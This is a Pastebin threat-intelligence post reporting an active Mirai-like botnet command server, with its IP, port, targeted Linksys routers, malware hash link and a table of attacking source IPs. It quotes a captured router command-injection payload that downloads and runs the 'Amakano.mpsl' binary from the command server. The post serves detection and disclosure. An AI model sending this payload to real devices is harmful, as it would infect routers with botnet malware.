Advertisement
internetweather

Mirai-like botnet C2: 192.236.162.197

Jul 16th, 2019
942
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.86 KB | None | 0 0
  1. Active Mirai-like botnet C2 detected:
  2. 192.236.162.197 (Hostwinds πŸ‡ΊπŸ‡Έ)
  3.  
  4. C2 port:
  5. 4426/tcp
  6.  
  7. Exploit attempts targeting:
  8. Linksys routers
  9.  
  10. Payload:
  11. "ttcp_ip=-h `cd /tmp;
  12. rm -rf Amakano.mpsl;
  13. wget http://192.236.162.197/vb/Amakano.mpsl;
  14. chmod 777
  15. Amakano.mpsl;
  16. ./Amakano.mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commi"
  17.  
  18. Malware binary:
  19. Amakano.mpsl
  20. https://www.virustotal.com/gui/file/7c2360a97f911aeef103e18414ad5e4f60153d28fc1735631445a0392a75c005/detection
  21. http://192.236.162.197/vb/ (open directory)
  22.  
  23. Exploit attempt source IPs:
  24. Source IP Country FirstSeen
  25. 101.108.14.144 Thailand 2019-07-16T05:13:47Z
  26. 49.117.81.101 China 2019-07-16T03:33:34Z
  27. 109.116.203.139 Italy 2019-07-16T02:57:07Z
  28. 151.70.138.75 Italy 2019-07-16T02:05:19Z
  29. 2.45.252.16 Italy 2019-07-15T23:56:21Z
  30. 114.235.35.12 China 2019-07-15T23:43:14Z
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement